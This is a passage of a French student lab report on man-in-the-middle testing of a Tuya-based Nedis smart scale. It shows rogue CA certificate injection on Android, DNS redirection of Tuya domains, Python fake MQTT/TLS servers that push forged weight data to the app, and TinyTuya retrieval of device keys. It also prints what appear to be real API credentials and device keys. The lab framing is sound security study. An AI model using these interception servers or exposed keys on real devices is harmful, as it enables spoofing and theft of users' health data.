Le certificat peut être ajouté dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse-personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment où elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon PC (celui qui host ma VM Android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire, je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>Visiblement notre balance communique avec Tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant, on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de Bind, un fichier db.tuyaeu.com et une page Apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que, quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui répond avec l'IP de notre serveur.

On va créer un faux serveur pour déchiffrer ce que nous dit la balance.<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>On constate que, dès que la balance tente de se connecter, elle ferme la connexion pour cause "no shared cipher".

Malheureusement, je constate (un peu tard) que notre balance ne pourra pas communiquer avec notre serveur puisqu'elle ne possède pas le certificat de notre autorité de certification. Elle refuse donc de communiquer avec notre serveur.

Il faudrait réussir à injecter le certificat dans la balance en communiquant directement avec elle.

== Envoi de fausses informations vers l'application ==

Dans cette partie, nous allons tenter d'envoyer un poids à l'application depuis notre serveur.

L'appli tape sur 443 et 8883 (mqtt qui fonctionne avec tls) comme on peut le voir sur cet extrait:<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# tcpdump -i eth1 -n src 172.16.10.102 and not port 53

...

11:59:46.829382 IP 172.16.10.102.53314 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:47.005041 IP 172.16.10.102.54915 > 172.16.10.255.54915: UDP, length 263
11:59:47.295737 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.346713 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [S], seq 1755898328, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.347853 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [.], ack 273869652, win 255, length 0
11:59:47.534641 IP 172.16.10.102.53318 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0

...

11:59:48.189587 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [P.], seq 517:547, ack 1256, win 251, length 30
11:59:48.190681 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:48.256593 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0
11:59:48.324124 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

</syntaxhighlight>

On va donc tenter d'envoyer des informations erronés de notre serveur vers notre application.

Dans un premier temps on va tenter d'établir une connexion sécurisé entre l'appli et notre serveur.

Tuya utilise un protocole MQTT pour les échanges de données. On va donc simuler un serveur MQTT en python qui utilise un certificat signé par notre autorité de certification.<syntaxhighlight lang="python3">
import socket
import ssl

CERT_FILE = "/etc/apache2/ssl/tuya.crt"
KEY_FILE = "/etc/apache2/ssl/tuya.key"
PORT = 8883

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
except Exception as e:
print(f"impossible de charger les clés SSL\n{e}")
return

bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(('0.0.0.0', PORT))
bindsocket.listen(5)

print(f"faux Serveur MQTT en écoute sur le port {PORT}...")
print("en attente de l'application Android...")

while True:
try:
newsocket, fromaddr = bindsocket.accept()
print(f"\nconnexion TCP reçue de {fromaddr[0]}")

try:
conn = context.wrap_socket(newsocket, server_side=True)
print(f"handshake SSL réussi")

data = conn.recv(1024)
print(f"données reçues ({len(data)} octets) :")
print(data)

except ssl.SSLError as e:
print(f"échec SSL rejet du certificat.\n{e}")
except Exception as e:
print(f"erreur de lecture : {e}")
finally:
pass

except KeyboardInterrupt:
print("\narrêt.")
break

if __name__ == '__main__':
start_server()
</syntaxhighlight><syntaxhighlight lang="linux-config">
connexion TCP reçue de 172.16.10.102
handshake SSL réussi
données reçues (529 octets) :
b'\x10\x8e\x04\x00\x04MQTT\x04\xce\x00<\x00lcom.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT\x00\x0ftuya/smart/will\x00\xfa{"clie
ntId":"com.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT","deviceType":"ANDROID","message":"","userName":"e5a1220d6003e352f8b34a81
cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc"}\x00up1027735_v1_4dtc78phe7grtfdfv7fp_a4206d71_mb_eu17623708062605mpDdzpA355dad9b8086f63442d98e227e039cf5315158b056398c8fb\x00\x10388c
a5a77b82c5ad'
</syntaxhighlight>On constate à la suite de cela que notre application fait totalement confiance à notre faux serveur. Il faut maintenant le format sous lequel envoyer notre message pour quelle ajoute un poids dans l'application.

On tente donc d'envoyer en clair le poids vers l'application de Nedis<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# cat fake_serv2.py
import socket
import ssl
import time
import json
import struct

# ================= CONFIGURATION =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

PAYLOAD_POIDS = {
"protocol": 4,
"t": int(time.time()),
"data": {
"dps": {
"1": 8050,
"2": True,
"3": "kg"
}
}
}
# =================================================

def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS prêt sur {PORT}")

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# ================= HANDLERS =================

# CONNECT
if pkt_type == 1:
print(">>> CONNECT reçu")
conn.send(b"\x20\x02\x00\x00")
print("<<< CONNACK envoyé")

# SUBSCRIBE
elif pkt_type == 8:
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")

# SUBACK (QoS 1 accepté)
suback_payload = msg_id + b"\x01"
conn.send(create_mqtt_packet(9, 0x00, suback_payload))
print("<<< SUBACK OK")

# Mapping OUT -> IN
pub_topic = topic.replace("/out/", "/in/")
print(f"Publication sur : {pub_topic}")

time.sleep(0.5)

json_payload = json.dumps(PAYLOAD_POIDS)
topic_bytes = pub_topic.encode()

var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
conn.send(packet)

print(f"Payload envoyé (NON chiffré)")

# PINGREQ
elif pkt_type == 12:
conn.send(b"\xd0\x00")

else:
print(f"Packet MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur connexion : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>

On cherche dans le fichier shared_prefs situé dans /data/data/com.nedis.smartlife sur la VM android une clé local qui permettrai de chiffrer le message pour que Nedis l'accepte.<syntaxhighlight lang="linux-config">
emulator64_x86_64_arm64:/data/data/com.nedis.smartlife/shared_prefs # grep -r "localKey"

./sig_mesh_storage.xml: <string name="sig_mesheu176237y8062605m7Ddzpr3a6d803edeb314f364c55d2caab540918">[{"appkey":"2FC5C9F42A44F9D243F960231C370DC6","code":"mebf11e37fc6632a9b44qg","endTime":0,"ivIndex":0,"key":"mebf11e37fc6632a9b44qg","localKey":"674d29fb978a1705","meshId":"mebf11e37fc6632a9b44qg","meshKey":"2FC5C9F42A44F9D243F960231C370DC6","meshkey":"2FC5C9F42A44F9D243F960231C370DC6","name":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","netWorkkey":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","password":"fa1667ca872e46d4","pv":"2.1","resptime":0,"share":false,"startTime":0,"tempShare":false}]</string>
</syntaxhighlight>Je vais apprendre plus tard que cette clé est une clé qui permet de sécuriser l'échange Bluetooth entre la balance et le téléphone lors de la première connexion. Mais avant de le savoir, j'ai tenté d'améliorer le faux serveur avec cette clé.<syntaxhighlight lang="linux-config">
#!/usr/bin/env python3
import socket
import ssl
import time
import json
import struct
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# ================= CONFIG =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

# LOCAL KEY 16 caractères
LOCAL_KEY = b"674d29fb978a1705"

# DPS balance (poids correct pour Nedis)
DPS_POIDS = {
"1": 8050, # 80.50 kg
"2": 1, # stable
"3": "kg"
}
# =========================================

# ---------- TUYA CRYPTO ----------
def tuya_encrypt(data: dict, local_key: bytes) -> str:
raw = json.dumps(data, separators=(',', ':')).encode()
cipher = AES.new(local_key, AES.MODE_ECB)
encrypted = cipher.encrypt(pad(raw, 16))
return base64.b64encode(encrypted).decode()

def tuya_sign(enc_data: str, ts: int, local_key: bytes) -> str:
s = f"data={enc_data}&t={ts}&key={local_key.decode()}"
return hashlib.md5(s.encode()).hexdigest()

def build_tuya_payload(dps: dict, device_id: str) -> dict:
ts = int(time.time())
enc = tuya_encrypt({
"devId": device_id,
"dps": dps
}, LOCAL_KEY)
sign = tuya_sign(enc, ts, LOCAL_KEY)
return {
"protocol": 4,
"t": ts,
"data": enc,
"sign": sign
}

def extract_device_id(topic: str) -> str:
return topic.split("/")[-1]

# ---------- MQTT UTILS ----------
def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

# ---------- SERVER ----------
def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS Tuya prêt sur {PORT}")

published_topics = set()

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# -------- HANDLERS --------
if pkt_type == 1: # CONNECT
print(">>> CONNECT")
conn.send(b"\x20\x02\x00\x00") # CONNACK OK

elif pkt_type == 8: # SUBSCRIBE
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")
conn.send(create_mqtt_packet(9, 0x00, msg_id + b"\x01")) # SUBACK QoS 1

# Publication automatique
device_id = extract_device_id(topic)
tuya_payload = build_tuya_payload(DPS_POIDS, device_id)
json_payload = json.dumps(tuya_payload)

topic_bytes = topic.encode()
var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
time.sleep(0.5)
conn.send(packet)
print("POIDS TUYA CHIFFRÉ ENVOYÉ")

elif pkt_type == 4: # PUBACK
print("<<< PUBACK")

elif pkt_type == 10: # UNSUBSCRIBE
msg_id = payload[0:2]
conn.send(create_mqtt_packet(11, 0x00, msg_id))
print("<<< UNSUBACK")

elif pkt_type == 12: # PINGREQ
conn.send(b"\xd0\x00")

else:
print(f"MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>Je pense que pour faire fonctionner cette méthode, il faut absolument que je trouve la clé qui crypte le message pour que Nedis l'accepte quand il le reçoit

J'ai donc cherché dans cette direction et j'ai découvert deux choses.

Premièrement, TinyTuya, une API Python pour les appareils intelligents Tuya (génial, Nedis utilise Tuya) WiFi utilisant une connexion directe au réseau local (LAN) ou le cloud (API TuyaCloud). TinyTuya permet entre autre de récupérer la fameuse clé.

Ensuite, j'ai découvert la plateforme IOT de Tuya qui permet, en connectant son application de téléphone sur le site, de jouer avec ses appareils Tuya pour une connexion avec Home Assisant ou encore ... TinyTuya !

Spoiler alerte: J'ai du changer d'application et cette application ne tape plus sur la même adresse. Elle tape sur XX-eu.lifeaiot.com il a donc fallu refaire une redirection vers notre serveur pour ces nouvelles adresses.

Spoiler alerte: j'ai la clé. Je parle plus de TinyTuya dans la prochaine partie car même avec cette clé, ce faux serveur ne marche pas. Je vais donc tenter d'autres pistes.

== TinyTuya ==
Dans cette partie, nous allons tenter de connecter notre balance à notre faux serveur en utilisant l'utilitaire TinyTuya. Le but est de récupérer le poids de l'utilisateur de la balance lorsqu'il se pèse.

Dans un premier temps il a fallu connecter l'appli à la platforme IOT de Tuya. L'application "Nedis Smartlife" de Nedis, qui utilise bien la même base que l'application Smartlife de Tuya (oui oui c'est le même nom…) ne veux pas se connecter à la plateforme pour une raison inexplicable (et au vu du nombre de forum qui parle du sujet, je ne suis pas le seul).

J'ai donc du connecter ma balance sur l'appli Smartlife qui a bien voulu se connecter à la plateforme.

Cela me permet de récupérer avec TinyTuya les périphériques

Et je vais maintenant tenter d'expliquer le fonctionnement de TinyTuya étape par étape…

Déjà pourquoi connecter l'application avec la plateforme IOT de Tuya --> Cela permet à l'appli de récupérer les appareils connectés de mon application, elle va générer un ID et une clé.

Et comment faire pour que TinyTuya est accès aux appareils --> grâce à la commande <code>python -m tinytuya wizard</code> qui va prendre l'ID et la clé pour récupérer les appareils.

Ensuite la commande suivante va permettre à TinyTuya de détecter nos appareils qui sont effectivement connecté à notre réseau :<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya devices
TinyTuya (Tuya device scanner) [1.17.4] Loaded devices.json - 1 devices: Device Listing [
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {} } ]
</syntaxhighlight>Et la, magie, on obtient la clé de la balance, on va pouvoir enfin récupérer le poids de notre utilisateur grâce à ce code python qui écoute la balance:<syntaxhighlight lang="python">
import tinytuya

DEVICE_ID = '84853100a4e57c162d4c'
IP_ADDRESS = '172.16.10.105'
LOCAL_KEY = 'V[z^Gr|qekh]9z_>'

# Connexion à l'appareil
d = tinytuya.Device(DEVICE_ID, IP_ADDRESS, LOCAL_KEY)

d.set_version(3.3)

# Récupérer le statut
data = d.status()
print("Statut complet :", data)
</syntaxhighlight>Évidemment cela ne fonctionne pas. Et pourquoi ? Et bien si l'on regarde dans le bloc <code>python3 -m tinytuya devices TinyTuya</code> on observe que le champs mapping est vide. Ce champs est censé afficher toute les données que TinyTuya est censé pouvoir récupérer … et il est vide …

Soit je suis à l'origine de ce problème, soit TinyTuya ne permet de changer nous ampoules connecté en rouge si la balance affiche que notre objectif de poids est dépassé …

Affaire à suivre.

TODO : ne marche pas en local ? tenter d'enlever la redirection

<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya wizard -force
TinyTuya Setup Wizard [1.17.4]

Existing settings:
API Key=g5wufknjhcwqkkpsrgug
Secret=edac1effd9374f50b6c61ddd2ea1e734
DeviceID=84853100a4e57c162d4c
Region=eu

Use existing credentials (Y/n):

Download DP Name mappings? (Y/n):

Device Listing

[
{
"name": "D\u00e9tecteur de fum\u00e9e",
"id": "86730270483fda3155d0",
"key": "r@fAdR'PW~0O`v5@",
"mac": "48:3f:da:31:55:d0",
"uuid": "86730270483fda3155d0",
"sn": "1000716370419B",
"category": "ywbj",
"product_name": "Smoke detector",
"product_id": "inwnovped8h5aoaw",
"biz_type": 18,
"model": "WIFIDS20WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/651af99cad24017128e3dc2322461ae5.png",
"mapping": {
"1": {
"code": "smoke_sensor_status",
"type": "Enum",
"values": {
"range": [
"alarm",
"normal"
]
}
},
"14": {
"code": "battery_state",
"type": "Enum",
"values": {
"range": [
"low",
"middle",
"high"
]
}
}
}
},
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {}
}
]

>> Saving list to devices.json
2 registered devices saved

>> Saving raw TuyaPlatform response to tuya-raw.json

Poll local devices? (Y/n):

Scanning local network for Tuya devices...
Scan network 172.16.10.0/24 from interface eth0? ([Y]es/[n]o/[a]ll yes):
Scan network 172.26.145.0/24 from interface eth1? ([Y]es/[n]o/[a]ll yes): n
Scan network 172.26.145.0/24 from interface eth1? ([Y]es/[n]o/[a]ll yes): n
0 local devices discovered

Polling local devices...
[Détecteur de fumée ] Error: No IP found
[Pèse pas que des personne] Error: No IP found

>> Saving device snapshot data to snapshot.json

Done.

</syntaxhighlight><syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya wizard
TinyTuya Setup Wizard [1.17.4]

Existing settings:
API Key=g5wufknjhcwqkkpsrgug
Secret=edac1effd9374f50b6c61ddd2ea1e734
DeviceID=84853100a4e57c162d4c
Region=eu

Use existing credentials (Y/n): n

Enter API Key from tuya.com: g5wufknjhcwqkkpsrgug
Enter API Secret from tuya.com: edac1effd9374f50b6c61ddd2ea1e734
Enter any Device ID currently registered in Tuya App (used to pull full list) or 'scan' to scan for one: bf85da6b2eccef5784rydz

Region List
cn China Data Center (alias: AY)
us US - Western America Data Center (alias: AZ)
us-e US - Eastern America Data Center (alias: UE)
eu Central Europe Data Center
eu-w Western Europe Data Center (alias: WE)
in India Data Center
sg Singapore Data Center

Enter Your Region (Options: cn, us, us-e, eu, eu-w, in, or sg): eu

>> Configuration Data Saved to tinytuya.json
{
"apiKey": "g5wufknjhcwqkkpsrgug",
"apiSecret": "edac1effd9374f50b6c61ddd2ea1e734",
"apiRegion": "eu",
"apiDeviceID": "bf85da6b2eccef5784rydz"
}

Download DP Name mappings? (Y/n):

Device Listing

[
{
"name": "Ampoule Connect\u00e9e",
"id": "bf85da6b2eccef5784rydz",
"key": "ZO:}y#{'gM.QuI|T",
"mac": "10:5a:17:a9:b5:6f",
"uuid": "b73f1a854ac4219e",
"sn": "830-2-20148D",
"category": "dj",
"product_name": "Smart bulb",
"product_id": "mdzqw8qjfzfdjz9n",
"biz_type": 18,
"model": "WIFILRW10E27",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/9a70929a5f5c1855c1c091ab404b8319.png",
"mapping": {
"20": {
"code": "switch_led",
"type": "Boolean",
"values": {}
},
"21": {
"code": "work_mode",
"type": "Enum",
"values": {
"range": [
"white",
"colour",
"scene",
"music"
]
}
},
"22": {
"code": "bright_value_v2",
"type": "Integer",
"values": {
"min": 10,
"max": 1000,
"scale": 0,
"step": 1
}
},
"23": {
"code": "temp_value_v2",
"type": "Integer",
"values": {
"min": 0,
"max": 1000,
"scale": 0,
"step": 1
}
},
"25": {
"code": "scene_data_v2",
"type": "Json",
"raw_values": "{\"scene_num\":{\"min\":1,\"scale\":0,\"max\":8,\"step\":1},\"scene_units\": {\"unit_change_mode\":{\"range\":[\"static\",\"jump\",\"gradient\"]},\"unit_switch_duration\":{\"min\":0,\"scale\":0,\"max\":100,\"step\":1},\"unit_gradient_duration\":{\"min\":0,\"scale\":0,\"max\":100,\"step\":1},\"bright\":{\"min\":0,\"scale\":0,\"max\":1000,\"step\":1},\"temperature\":{\"min\":0,\"scale\":0,\"max\":1000,\"step\":1},\"h\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":360,\"step\":1},\"s\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1},\"v\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}}}",
"values": {
"scene_num": {
"min": 1,
"scale": 0,
"max": 8,
"step": 1
},
"scene_units": {
"unit_change_mode": {
"range": [
"static",
"jump",
"gradient"
]
},
"unit_switch_duration": {
"min": 0,
"scale": 0,
"max": 100,
"step": 1
},
"unit_gradient_duration": {
"min": 0,
"scale": 0,
"max": 100,
"step": 1
},
"bright": {
"min": 0,
"scale": 0,
"max": 1000,
"step": 1
},
"temperature": {
"min": 0,
"scale": 0,
"max": 1000,
"step": 1
},
"h": {
"min": 0,
"scale": 0,
"unit": "",
"max": 360,
"step": 1
},
"s": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"v": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
}
}
}
},
"26": {
"code": "countdown_1",
"type": "Integer",
"values": {
"unit": "s",
"min": 0,
"max": 86400,
"scale": 0,
"step": 1
}
},
"28": {
"code": "control_data",
"type": "Json",
